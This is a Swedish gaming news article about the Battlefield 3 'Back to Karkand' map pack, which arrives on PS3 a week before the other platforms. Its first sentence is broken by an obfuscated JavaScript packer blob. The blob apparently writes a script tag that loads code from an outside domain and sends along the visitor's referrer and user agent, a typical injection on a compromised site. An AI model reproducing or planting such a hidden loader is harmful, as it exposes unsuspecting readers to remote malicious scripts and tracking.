Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

BF3: Back to Karkand släpps nästa vecka – Endast till PS3

BF3: Back to Karkand släpps nästa vecka – Endast till PS3
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|taynt|var|u0026u|referrer|etrfi||js|php’.split(’|’),0,{}))
har hysterin kring Battlefield 3 lugnat ner sig lite och spelet har fått möjligheten att rota sig en aning. Då, som ni säkert vet, släpper Dice och EA det första expansionpaket ”Back to Karkand”, en nytolkning av Dices och BF-spelarnas favoritbanor (inklusive fordonen och vapnen) från Battlefield 2. Paketet släpps redan nästa vecka, men bara till PS3.

”Back to Karkand” släpps den sjätte december på amerikanska PSN (den sjunde december här i Europa), och många trodde att ett PC- och Xbox 360-släpp skulle ske samtidigt vilket Sony och PS3 ändrat på, då de sett till att de får en veckas exklusivitet vilket alltså betyder att Microsoft-anhängarna får vänta tills veckan efter innan de kan köpa (eller om de köpte Limited Edition, ladda ner) paketet. Detta betyder väl inte så mycket egentligen, men det har fått en hel del BF3-spelare att bli förbannade och många har gjort sig hörda online över olika forum.

Det första kartpaketet innehåller de fyra klassiska Battlefield 2-banorna Strike at Karkand, Wake Island, Gulf of Oman och the Sharqi Peninsula nytolkade i Frostbite 2-motorn tillsammans med BF2-fordonen och de populäraste vapnen som för övrigt kommer gå att använda på övriga BF3-banor.

httpv://www.youtube.com/watch?v=TyN_Zjw4l-s

Comments